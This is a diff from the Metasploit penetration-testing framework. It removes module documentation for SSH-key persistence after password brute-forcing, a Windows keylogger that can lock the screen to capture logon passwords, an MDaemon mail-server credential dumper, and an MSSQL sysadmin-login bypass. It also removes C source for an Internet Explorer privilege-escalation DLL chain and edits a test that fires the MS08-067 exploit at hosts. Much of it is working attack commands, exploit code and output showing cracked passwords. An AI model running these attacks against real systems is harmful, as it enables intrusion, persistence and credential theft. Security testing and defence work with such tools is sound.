-
-    msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
-    msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.130
-    rhosts => 192.168.2.130
-    msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
-    key_path => /root/.msf4/loot/
-    msf auxiliary(ssh_login_pubkey) > set username root
-    username => root
-    msf auxiliary(ssh_login_pubkey) > run
-    
-    [*] 192.168.2.130:22 SSH - Testing Cleartext Keys
-    [*] SSH - Testing 4 keys from /root/.msf4/loot
-    [+] SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
-    MIIEowIBAAKCAQEAqBC5XwkPOAtFn8zCFWIs3IIzUUfMvJPWxQQl1Porf8GiSs2B
-    ...snip...
-    6aj815iPJp9X5vnIR6mRdTJP9UQraPe6jneicx8QfncfoqJbA2v7
-    -----END RSA PRIVATE KEY-----
-    ' 'uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) FreeBSD freebsd9 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64 '
-    [*] Command shell session 2 opened (192.168.2.229:32991 -> 192.168.2.130:22) at 2016-06-19 22:14:16 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-
-### Fedora 20 (root)
-
-Get Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username root
-    username => root
-    msf auxiliary(ssh_login) > set password password
-    password => password
-    msf auxiliary(ssh_login) > set rhosts 192.168.2.143
-    rhosts => 192.168.2.143
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'root:password' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:35460 -> 192.168.2.143:22) at 2016-06-19 20:27:53 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set user root
-    user => root
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Added User SSH Path: /root/.ssh
-    [+] Storing new private key as /root/.msf4/loot/20160619202835_default_192.168.2.143_id_rsa_458964.txt
-    [*] Creating /root/.ssh/authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1456 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Post module execution completed
-
-Verify our access works
-
-    msf post(sshkey_persistence) > use auxiliary/scanner/ssh/ssh_login_pubkey 
-    msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.143
-    rhosts => 192.168.2.143
-    msf auxiliary(ssh_login_pubkey) > set key_path /root/.msf4/loot/
-    key_path => /root/.msf4/loot/
-    msf auxiliary(ssh_login_pubkey) > set username root
-    username => root
-    msf auxiliary(ssh_login_pubkey) > run
-    
-    [*] 192.168.2.143:22 SSH - Testing Cleartext Keys
-    [*] SSH - Testing 2 keys from /root/.msf4/loot
-    [!] No active DB -- Credential data will not be saved!
-    [+] SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
-    MIIEowIBAAKCAQEAx5LLnAOPzc5KSI/Zd71bdHlexQrIpuASjUIGnJjlJVB9Sfyz
-    ...snip...
-    vtOaL6/NsfxFDDrCBX72X5tv3rTA4MNzOFTYbCM80Ln6E2TDWgPv
-    -----END RSA PRIVATE KEY-----
-    ' 'uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
-    [*] Command shell session 2 opened (192.168.2.229:35751 -> 192.168.2.143:22) at 2016-06-19 20:31:23 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-
-### Fedora 20 (user level)
-
-Get Initial Access
-
-    msf > use auxiliary/scanner/ssh/ssh_login
-    msf auxiliary(ssh_login) > set username user
-    username => user
-    msf auxiliary(ssh_login) > set password password
-    password => password
-    msf auxiliary(ssh_login) > set rhosts 192.168.2.143
-    rhosts => 192.168.2.143
-    msf auxiliary(ssh_login) > exploit
-    
-    [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'user:password' 'uid=1000(user) gid=1000(user) groups=1000(user),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux localhost.homeGroup 3.11.10-301.fc20.x86_64 #1 SMP Thu Dec 5 14:01:17 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux '
-    [!] No active DB -- Credential data will not be saved!
-    [*] Command shell session 1 opened (192.168.2.229:37727 -> 192.168.2.143:22) at 2016-06-19 20:33:45 -0400
-    [*] Scanned 1 of 1 hosts (100% complete)
-    [*] Auxiliary module execution completed
-
-Use the post module to write the ssh key
-
-    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
-    msf post(sshkey_persistence) > set session 1
-    session => 1
-    msf post(sshkey_persistence) > set verbose true
-    verbose => true
-    msf post(sshkey_persistence) > set username user
-    username => user
-    msf post(sshkey_persistence) > exploit
-    
-    [*] Checking SSH Permissions
-    [*] Authorized Keys File: .ssh/authorized_keys
-    [*] Finding .ssh directories
-    [+] Storing new private key as /root/.msf4/loot/20160619203401_default_192.168.2.143_id_rsa_010117.txt
-    [*] Creating /home/user/.ssh/authorized_keys
-    [*] Max line length is 65537
-    [*] Writing 380 bytes in 1 chunks of 1452 bytes (octal-encoded), using printf
-    [+] Key Added
-    [!] No active DB -- Credential data will not be saved!
-    [*] Post module execution completed
@@ -1,5 +1,5 @@
-`shell_to_meterpreter` allows you to upgrade a shell session to Meterpreter. It can be launched as
-a post module, or from the `sessions` command. By default, this module will use a reverse
+shell_to_meterpreter allows you to upgrade a shell session to Meterpreter. It can be launched as
+a post module, or from the sessions command. By default, this module will use a reverse
 Meterpreter.

 ## Important Options
@@ -29,7 +29,7 @@ use this.

 **Using sessions -u**

-`sessions -u` is the same as running the post module against a specific session. However, this
+```sessions -u``` is the same as running the post module against a specific session. However, this
 is limited to using the default reverse Meterpreter payload, so you will not be able to use it
 via a pivot.

@@ -46,7 +46,7 @@ Active sessions
  --  ----           -----------  ----------
  1   shell windows               192.168.146.1:4444 -> 192.168.146.128:1204 (192.168.146.128)

-msf >
+msf > 
 ```

 In this demonstration, session 1 is a shell, so we upgrade that:
@@ -125,4 +125,4 @@ msf post(shell_to_meterpreter) > run
 ...
 [*] Command stager progress: 100.00% (102108/102108 bytes)
 [*] Meterpreter session 3 opened (192.168.146.1-192.168.146.128:4433 -> 192.168.1.102:1056) at 2016-04-28 22:50:56 -0500
-```
+```
@@ -1,76 +0,0 @@
-## Overview
-
-This module captures keystrokes from a Windows target and saves them to a text file in loot. Keystrokes can be captured from explorer.exe, winlogon.exe, or a specific process of your choice. The module is capable of being run as a job to keep the Framework's user interface available for other tasks.
-
-## Requirements
- Windows Meterpreter Session
-
-## Module Options
- **CAPTURE_TYPE** - This option sets the process where the module records keystrokes. Accepted: explorer, winlogon, or pid. Default value is explorer.
-
- **INTERVAL** - The interval in seconds that the module uses for recording keystrokes. The log file goes to a new line at the end of each interval. Default value is 5 seconds.
-
- **LOCKSCREEN** - This option locks the screen of the target when set to TRUE. CAPTURE_TYPE must be set to winlogon. MIGRATE must be set to TRUE or the session must already be in winlogon.exe. Defalt value is FALSE.
-
- **MIGRATE** - This option migrates the session based on the CAPTURE_TYPE. Explorer.exe for explorer, winlogon.exe for winlogon, or a specified PID for pid. Default value is FALSE.
-
- **PID** - The PID of a process to migrate the session into. CAPTURE_TYPE of pid must be set, and the sepecified PID must exist on the target machine.
-
- **SESSION** - The session to run the module on.
-
-### Advanced Options
- **ShowKeystrokes** - This option prints the captured keystrokes to the Framework UI on the specified interval. Default is FALSE.
- **TimeOutAction** - This option sets the behavior the module takes if the key capture request times out. (See below.) Accepted: wait or exit. Default value is wait.
-
-## Usage
-The Meterpreter session must be located in an appropriate process for keystroke recording to work properly. This is described in the below-listed capture types. This module can migrate the session if MIGRATE is set to TRUE. If winlogon or PID migration fails, the module will exit. Set MIGRATE to FALSE if migration will be performed manually or through another module. 
-
-### Capture Types
- **Explorer.exe** - __Session must be in explorer.exe__ - The most common capture type. Keystrokes are recorded from most user level applications. Applications running at an elevated level will likely not get recorded. **NOTE: Sessions running with elevated privileges are downgraded to user level when migrated into explorer.exe.** It is recommended that a second session be opened for keystroke recording if elevated priveledges are to be maintained.
-
- **Winlogon.exe** - __Session must be in winlogon.exe__ - Administrator or SYSTEM rights are required to migrate to winlogon.exe. Keylogging from this process records usernames and passwords as users log in. This capture type does not record keystrokes from any other process. Setting LOCKSCREEN to true locks Windows when the module is executed. This forces the user to unlock the computer, and their password is captured.
-
- **PID** - __Session must be in the specific process to be recorded.__ - This option is useful for recording keystrokes in applications or process that run with elevated priveledges. However, admin or SYSTEM rights are required to migrate to these processes. Only keystrokes from the specified process are recorded.
-
-## Running Module as a Job
-It is recommended to run this module as a job using: `exploit -j` or `run -j`. As a job, the module runs in the background preventing it from tying up the Framework's user interface. To stop capturing keystrokes, kill the job using `jobs -k`. The module records the last few keystrokes before exit. Stopping the job can take up to 30 seconds. If the session is killed, the key log job shuts down automatically.
-
-### TimeOutAction
-This module has two actions it can take if module requests time out. This occurs with packet-based payloads like `reverse_http` or `reverse_https` when the target system stops responding to requests for a specific period of time. The default is 300 seconds. Sessions can stop responding due to various events such as network problems, system shut down, system sleep, or user log off.
-
- **WAIT** - With this option selected, the module suspends attempting to gather keystrokes after the timeout. It waits for the session to become active again, then resumes capturing keystrokes. The output log reflects that recording was suspended along with a timestamp. If the session becomes active again, the log indicates this along with a timestamp. The wait option allows keystrokes to be logged over multiple system sleep cycles. In the event that the session dies, the recording job is stopped automatically.
-
- **EXIT** - With this option selected, the module exits and the job is killed when the timeout occurs. The output log reflects the exit along with a timestamp.
-
-### Running Module Stand Alone
-When running the module stand alone, it will prevent the Framework UI from being use for anything else until you exit the module. Use `CTRL-C` to exit. The module will save the last few keystrokes. This may take up to 30 seconds to complete.
-
-## Example Output
-```
-Keystroke log from explorer.exe on JULY with user JULY\User started at 2016-07-13 21:01:56 -0500
-
-This is an ex
-ample output from keylog_recorder.
- <Return>  <Return> On this line I make a typpor <Back>  <Back>  <Back> 
-o. <Return> 
- <Return> Username <Tab> Password <Return> 
- <Return> 
- <N1>  <N9>  <N2>  <Decimal>  <N1>  <N6>  <N8>  <Decimal>  <N1>  <Decimal>  <N1>  <N0>  <N0>  <Return> 
- Copy <Left>  <Left>  <Left>  <Left>  <Ctrl>  <LCtrl> c <Right>  <Right>  <Right>  <Right>  <Return>  <Return>  <Ctrl>  <LCtrl> v <Return>  <Return> 
-
-Keylog Recorder timed out - now waiting at 2016-07-13 21:09:33 -0500
-
-
-Keylog Recorder resumed at 2016-07-13 21:11:36 -0500
-
- <Return> T
-his is keys logged after the computer
- was put to sleep and then woken back up.
- <Return> 
-
-Keylog Recorder exited at 2016-07-13 21:12:44 -0500
-```
-
-
-
-
@@ -1,115 +0,0 @@
-## Vulnerable Application
-
-Download and install the email server: [www.altn.com](http://www.altn.com/Downloads/MDaemon-Mail-Server-Free-Trial/)
-
-You require a valid licence, but there's a demo for 30 days.
-
-### Verified
-
-1. AWS --> Microsoft Windows Server 2012 R2 Base - ami-8d0acfed Instance: t2.micro @ July-August 2016 x64 bits with meterpreter 64 bits.
-2. AWS --> Microsoft Windows Server 2012 R2 Base - ami-8d0acfed Instance: t2.micro @ July-August 2016 x64 bits with meterpreter 32 bits. Worked,  but couldn't find the path through Register.
-3. VM --> Microsoft Windows 7 on VMWare.
-
-## Verification Steps
-
-1. Get a meterpreter on a windows machine that has MDaemon installed.
-2. Load the module: `use post/windows/gather/credentials/mdaemon_cred_collector`
-3. Set the correct session on the module.
-  1. Optional: you can add the remote path of the installation, especially if the software is installed on a strange path and the module can't find it..
-4. Run the module and enjoy the loot.
-
-## Example Run
-**Normal mode**
-```
-msf > use post/windows/gather/credentials/mdaemon_cred_collector 
-msf > set SESSION 1
-msf > exploit 
-```
-
-Output:
-
-```
-[+] Configuration file found: C:\MDaemon\App\userlist.dat
-[+] Found MDaemons on WIN-F7ANP3JL4GJ via session ID: 1
-[*]     Extracted: MDaemon:p0%AhBxvs4IZ
-[*]     Extracted: webmaster:Manuel123.
-[*] SMTP credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.smtp_ser_754168.txt
-[*]     Extracted: webmaster:Manuel123.
-[*] POP3 credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.pop3_ser_608271.txt
-[*]     Extracted: webmaster:Manuel123.
-[*] IMAP credentials saved in: /root/.msf4/loot/20160831194802_default_127.0.0.1_MDaemon.imap_ser_769125.txt
-[*] Post module execution completed
-```
-
-**Verbose true**
-```
-msf > use post/windows/gather/credentials/mdaemon_cred_collector 
-msf > set SESSION 1
-msf > set verbose true
-msf > exploit 
-```
-
-Output:
-
-```
-[*] Searching MDaemon installation at C:
-[*] Found MDaemon installation at C:
-[*] Searching MDaemon installation at C:
-[*] Found MDaemon installation at C:
-[*] Searching MDaemon installation at C:\Program Files
-[*] Searching MDaemon installation at C:\Program Files (x86)
-[*] Searching MDaemon installation at C:\Program Files
-[*] Checking for Userlist in MDaemons directory at: C:\MDaemon\App
-[+] Configuration file found: C:\MDaemon\App\userlist.dat
-[+] Found MDaemons on WIN-F7ANP3JL4GJ via session ID: 1
-[*] Downloading UserList.dat file to tmp file: SFJOXMHZEFWA
-[*] Cracking xJiKYdun7OvjVLnM
-[*] Password p0%AhBxvs4IZ
-[*] Cracking ocnTldjRpaejTg==
-[*] Password Manuel123.
-[*] Collected the following credentials:
-[*]     Usernames: 2
-[*]     Passwords: 2
-[*] Deleting tmp file: SFJOXMHZEFWA
-[*]     Extracted: MDaemon:p0%AhBxvs4IZ
-[*]     Extracted: webmaster:Manuel123.
-[*] SMTP credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.smtp_ser_114741.txt
-[*]     Extracted: webmaster:Manuel123.
-[*] POP3 credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.pop3_ser_369240.txt
-[*]     Extracted: webmaster:Manuel123.
-[*] IMAP credentials saved in: /root/.msf4/loot/20160831194819_default_127.0.0.1_MDaemon.imap_ser_028427.txt
-[*] Post module execution completed
-```
-
-## Options
-
-  **RPATH**
-  The remote path of the MDaemon installation.
-  If the machine runs on 64bits and the meterpreter is 32 bits, it won't be able to find the installation path in the registry, but it will search some default paths. If it is installed on a non-default path you can give the RPATH and it will work.
-
-## Scenarios
-**Run on all sessions**
-If you wish to run the post against all sessions from framework, here is how:
-
-1. Create the following resource script:
-```
-framework.sessions.each_pair do |sid, session|
-  run_single("use post/windows/gather/credentials/mdaemon_cred_collector")
-  run_single("set SESSION #{sid}")
-  run_single("run")
-end
-```
-2. At the msf prompt, execute the above resource script:
-`msf > resource path-to-resource-script`
-
-**Meterpreter on email server**
-
-If you have a meterpreter running on a server that has MDaemon installed, run the module and you will get all the users and passwords of the email server. Quite useful for trying password reuse and/or checking the strength of the passwords.
-
-Note: MDaemon can store the passwords on a database, in that case the module won't work, but you can search for the database location, username and password and still get them :)
-
-
-## References
-http://www.securityfocus.com/bid/4686
-
-https://github.com/AgoraSecurity/MdaemonCrack
@@ -1,38 +0,0 @@
-## Overview
-
-This post-exploitation module enables you to add a sysadmin to local SQL Server instances, use that login to collect and gather data, and remove the login from the system. 
-
-Pre-2008 versions of MSSQL servers automatically granted local sysadmins admin rights. This changed in MSSQL Server 2008, but there are still ways around to get around it, thanks to this module! If you are able to get domain admin privileges, you'll be able to add yourself to the database domain group and access the server with your newly added account. 
-
-## Basic Workflow
-
-
-1. Get a Meterpreter session using a module like psexec. 
-2. Create a syadmin login on the SQL server.
-3. Log into SQL Server with the newly created login. 
-4. Find and collect data from the server using a module like Microsoft SQL Server Find and Sample Data.
-5. Remove the sysadmin login when you are done. 
-
-
-## Options
-
-The following options are required:
-
- **DB_PASSWORD** - This option sets the password for the new sysadmin login.
- **DB_USERNAME** - This option sets the name for the new sysadmin login. 
- **REMOVE_LOGIN** - This option removes DB_USERNAME from the database. 
- **SESSION** - This option sets the session that you want to use to run this module against. 
-
-## Scenarios
-
-Here's an example of how you can use this module:
-
-```
-meterpreter > use post/windows/manage/mssql_local_auth_bypass
-meterpreter > set DB_USERNAME tacocat
-meterpreter > set DB_PASSWORD 12345
-meterpreter > set SESSION 1
-meterpreter > exploit
-```
-
- 
@@ -1,183 +0,0 @@
-/*
-From: https://gist.github.com/worawit/1213febe36aa8331e092
-
-Simple local HTTP server for IE (with no AppContainer) privilege escalation.
-
-I implemented local server instead of proxy in Ref because 
-local server is easier to code. But local server is less useful then proxy.
-
-Ref:
-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb
-
-Note:
-From my test, by default IE does not configure intranet site.
-With this default, localhost is treated as internet site (run as low integrity).
-*/
-#define _CRT_SECURE_NO_WARNINGS
-#define WIN32_LEAN_AND_MEAN
-#include <winsock2.h>
-#include <stdio.h>
-#include <string.h>
-
-#pragma comment(lib, "ws2_32.lib")
-
-#define SERVER_PORT 5555
-
-static HANDLE hThread = NULL;
-
-static WCHAR stage2file[256];
-
-static SOCKET serverSk = INVALID_SOCKET;
-static SOCKET peerSk = INVALID_SOCKET;
-
-static SOCKET create_server()
-{
-	struct sockaddr_in skAddr;
-	SOCKET sk;
-	int optval;
-
-	sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
-	if (sk == INVALID_SOCKET)
-		return INVALID_SOCKET;
-
-	optval = 1;
-	setsockopt(sk, SOL_SOCKET, SO_REUSEADDR, (char*) &optval, sizeof(optval));
-
-	memset(&skAddr, 0, sizeof(skAddr));
-	skAddr.sin_family = AF_INET;
-	skAddr.sin_port = htons(SERVER_PORT);
-	skAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
-
-	if (bind(sk, (struct sockaddr *) &skAddr, sizeof(skAddr)) != 0)
-		goto on_error;
-
-	if (listen(sk, 5) != 0)
-		goto on_error;
-
-	return sk;
-
-on_error:
-	closesocket(sk);
-	return SOCKET_ERROR;
-}
-
-static int send_all(SOCKET sk, char *buffer, int size)
-{
-	int len;
-	while (size > 0) {
-		len = send(sk, buffer, size, 0);
-		if (len <= 0)
-			return 0;
-		buffer += len;
-		size -= len;
-	}
-
-	return 1;
-}
-
-static int local_server()
-{
-	int len;
-	int totalSize;
-	char buffer[4096];
-	HANDLE hFile = INVALID_HANDLE_VALUE;
-
-	serverSk = create_server();
-	if (serverSk == INVALID_SOCKET)
-		return SOCKET_ERROR;
-
-	while (1) {
-		peerSk = accept(serverSk, NULL, NULL);
-		if (peerSk == INVALID_SOCKET) {
-			continue;
-		}
-
-		len = recv(peerSk, buffer, sizeof(buffer), 0);
-		if (len <= 0)
-			goto closepeer;
-
-		hFile = CreateFile(stage2file, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-		if (hFile == INVALID_HANDLE_VALUE)
-			break;
-
-		totalSize = GetFileSize(hFile, NULL);
-		if (totalSize == INVALID_FILE_SIZE)
-			break;
-
-		len = _snprintf(buffer, sizeof(buffer), 
-			"HTTP/1.1 200 OK\r\n"
-			"Content-Type: text/html\r\n"
-			"Connection: Close\r\n"
-			"Content-Length: %d\r\n"
-			"\r\n",
-			totalSize
-		);
-		send_all(peerSk, buffer, len);
-
-		while (totalSize > 0) {
-			ReadFile(hFile, buffer, sizeof(buffer), (DWORD*) &len, NULL);
-			send_all(peerSk, buffer, len);
-			totalSize -= len;
-		}
-		CloseHandle(hFile);
-		hFile = INVALID_HANDLE_VALUE;
-
-closepeer:
-		closesocket(peerSk);
-		peerSk = INVALID_SOCKET;
-	}
-
-	if (hFile != INVALID_HANDLE_VALUE) {
-		CloseHandle(hFile);
-	}
-	if (peerSk != INVALID_SOCKET) {
-		closesocket(peerSk);
-		peerSk = INVALID_SOCKET;
-	}
-	if (serverSk != INVALID_SOCKET) {
-		closesocket(serverSk);
-		serverSk = INVALID_SOCKET;
-	}
-
-	return 0;
-}
-
-DWORD WINAPI threadProc(void *param)
-{
-	WSADATA wsaData;
-	WSAStartup(MAKEWORD(2 ,2), &wsaData);
-
-	local_server();
-
-	WSACleanup();
-
-	DeleteFile(stage2file);
-	return 0;
-}
-
-void do_work()
-{
-	GetEnvironmentVariableW(L"stage2file", stage2file, sizeof(stage2file));
-
-	hThread = CreateThread(NULL, 0, threadProc, NULL, 0, NULL);
-}
-
-BOOL APIENTRY DllMain( HMODULE hModule,
-                       DWORD  ul_reason_for_call,
-                       LPVOID lpReserved
-					 )
-{
-	switch (ul_reason_for_call)
-	{
-	case DLL_PROCESS_ATTACH:
-		do_work();
-		break;
-	case DLL_PROCESS_DETACH:
-		if (hThread) {
-			WaitForSingleObject(hThread, INFINITE);
-			CloseHandle(hThread);
-		}
-		break;
-	}
-	return TRUE;
-}
@@ -1,39 +0,0 @@
-/*
-From: https://gist.github.com/worawit/1213febe36aa8331e092
-
-Fake shell32.dll to be loaded after modified %SystemRoot%
-*/
-#define WIN32_LEAN_AND_MEAN
-#include <windows.h>
-
-static void do_work()
-{
-	WCHAR envBuffer[256];
-
-	GetEnvironmentVariableW(L"SaveSystemRoot", envBuffer, sizeof(envBuffer));
-	// restore system root
-	SetEnvironmentVariableW(L"SystemRoot", envBuffer);
-	//SetEnvironmentVariableW(L"SaveSystemRoot", NULL);
-
-	GetEnvironmentVariableW(L"MyDllPath", envBuffer, sizeof(envBuffer));
-	SetEnvironmentVariableW(L"MyDllPath", NULL);
-
-	// shell32.dll will be unloaded, use another dll
-	LoadLibraryExW(envBuffer, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
-}
-
-BOOL APIENTRY DllMain( HMODULE hModule,
-                       DWORD  ul_reason_for_call,
-                       LPVOID lpReserved
-					 )
-{
-	switch (ul_reason_for_call)
-	{
-	case DLL_PROCESS_ATTACH:
-		do_work();
-		break;
-	case DLL_PROCESS_DETACH:
-		break;
-	}
-	return TRUE;
-}
@@ -10,39 +10,18 @@ Feature: MS08-067 netapi
    Given I ready the windows targets
    Given a file named "ms08-067-bind.rc" with:
      """
-      <ruby>
-      self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
-      hosts           = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
-      payload_name    = 'windows/meterpreter/bind_tcp'
-      exploited_hosts = []
-      failed_hosts    = []
-
-      hosts.each do |host|
-        print_status("Trying MS08-067 against #{host['ipAddress']}")
-        mod = framework.exploits.create('windows/smb/ms08_067_netapi')
-        mod.datastore['PAYLOAD'] = payload_name
-        mod.datastore['RHOST'] = host['ipAddress']
-        m = mod.exploit_simple(
-          'LocalInput'  => nil,
-          'LocalOutput' => nil,
-          'Payload'     => payload_name,
-          'RunAsJob'    => false
-        )
-
-        sleep(1)
-
-        if m
-          exploited_hosts << host['ipAddress']
-        else
-          failed_hosts << host['ipAddress']
-        end
-      end
-
-      print_status("Exploited hosts: #{exploited_hosts.inspect}")
-      print_status("Failed hosts: #{failed_hosts.inspect}")
-      self.run_single('sessions -K')
-      </ruby>
+        <ruby>
+          hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
+          self.run_single('use exploit/windows/smb/ms08_067_netapi')
+          self.run_single('set payload windows/meterpreter/bind_tcp')
+          hosts.each do |host|
+            self.run_single("set RHOST #{host['ipAddress']}")
+            self.run_single('run -j')
+            sleep 1
+          end
+          self.run_single('sessions -K')
+        </ruby>
      """
-    When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
+    When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit`
    Then the 'Mdm::Host' table contains the expected targets
    
@@ -4,11 +4,6 @@ Before do
  @aruba_timeout_seconds = 8.minutes
 end

-Before('@db') do |scenario|
-  dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
-  ActiveRecord::Base.establish_connection(dbconfig["test"])
-end
-
 # don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
 # unless Bundler.settings.without.include?(:coverage)
 #   Before do |scenario|
@@ -17,7 +17,7 @@ module Metasploit
        # (see Base#attempt_login)
        def attempt_login(credential)
          http_client = Rex::Proto::Http::Client.new(
-            host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password
+            host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies
          )

          configure_http_client(http_client)
@@ -34,7 +34,7 @@ module Metasploit
            result_opts[:service_name] = 'http'
          end
          begin
-            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, http_username, http_password)
+            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version)
            configure_http_client(cli)
            cli.connect
            req = cli.request_cgi({
@@ -69,7 +69,7 @@ module Metasploit
        # @param (see Rex::Proto::Http::Resquest#request_raw)
        # @return [Rex::Proto::Http::Response] The HTTP response
        def send_request(opts)
-          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => self}, ssl, ssl_version, proxies, http_username, http_password)
+          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => self}, ssl, ssl_version, proxies)
          configure_http_client(cli)
          cli.connect
          req = cli.request_raw(opts)
@@ -35,9 +35,7 @@ module Metasploit
                                               },
                                               ssl,
                                               ssl_version,
-                                               proxies,
-                                               http_username,
-                                               http_password)
+                                               proxies)
            configure_http_client(cli)
            cli.connect

@@ -20,13 +20,6 @@ module Metasploit
        #   @return [String] Cookie session
        attr_accessor :jsession

-        # @!attribute http_username
-        attr_accessor :http_username
-        #   @return [String] HTTP username
-
-        # @!attribute http_password
-        attr_accessor :http_password
-
        # (see Base#check_setup)
        def check_setup
          begin
@@ -68,7 +61,7 @@ module Metasploit
        # @param (see Rex::Proto::Http::Resquest#request_raw)
        # @return [Rex::Proto::Http::Response] The HTTP response
        def send_request(opts)
-          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password)
+          cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies)
          configure_http_client(cli)
          cli.connect
          req = cli.request_raw(opts)
@@ -161,14 +161,6 @@ module Metasploit
        #   @return [Boolean] Whether to conform to IIS digest authentication mode.
        attr_accessor :digest_auth_iis

-        # @!attribute http_username
-        # @return [String]
-        attr_accessor :http_username
-
-        # @!attribute http_password
-        # @return [String]
-        attr_accessor :http_password
-

        validates :uri, presence: true, length: { minimum: 1 }

@@ -179,7 +171,7 @@ module Metasploit
        # (see Base#check_setup)
        def check_setup
          http_client = Rex::Proto::Http::Client.new(
-            host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password
+            host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies
          )
          request = http_client.request_cgi(
            'uri' => uri,
@@ -221,8 +213,8 @@ module Metasploit
          cli_ssl         = opts['ssl'] || ssl
          cli_ssl_version = opts['ssl_version'] || ssl_version
          cli_proxies     = opts['proxies'] || proxies
-          username        = opts['credential'] ? opts['credential'].public : http_username
-          password        = opts['credential'] ? opts['credential'].private : http_password
+          username        = opts['credential'] ? opts['credential'].public : ''
+          password        = opts['credential'] ? opts['credential'].private : ''
          realm           = opts['credential'] ? opts['credential'].realm : nil
          context         = opts['context'] || { 'Msf' => framework, 'MsfExploit' => framework_module}

@@ -7,18 +7,10 @@ module Metasploit
      # IP Board login scanner
      class IPBoard < HTTP

-        # @!attribute http_username
-        # @return [String]
-        attr_accessor :http_username
-
-        # @!attribute http_password
-        # @return [String]
-        attr_accessor :http_password
-
        # (see Base#attempt_login)
        def attempt_login(credential)
          http_client = Rex::Proto::Http::Client.new(
-              host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, self.http_username, self.http_password
+              host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies
          )
          configure_http_client(http_client)

@@ -37,7 +37,7 @@ module Metasploit
            result_opts[:service_name] = 'http'
          end
          begin
-            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies, http_username, http_password)
+            cli = Rex::Proto::Http::Client.new(host, port, {'Msf' => framework, 'MsfExploit' => framework_module}, ssl, ssl_version, proxies)
            configure_http_client(cli)
            cli.connect
            req = cli.request_cgi({
@@ -35,7 +35,7 @@ module Metasploit
          begin
            cred = Rex::Text.uri_encode(credential.private)
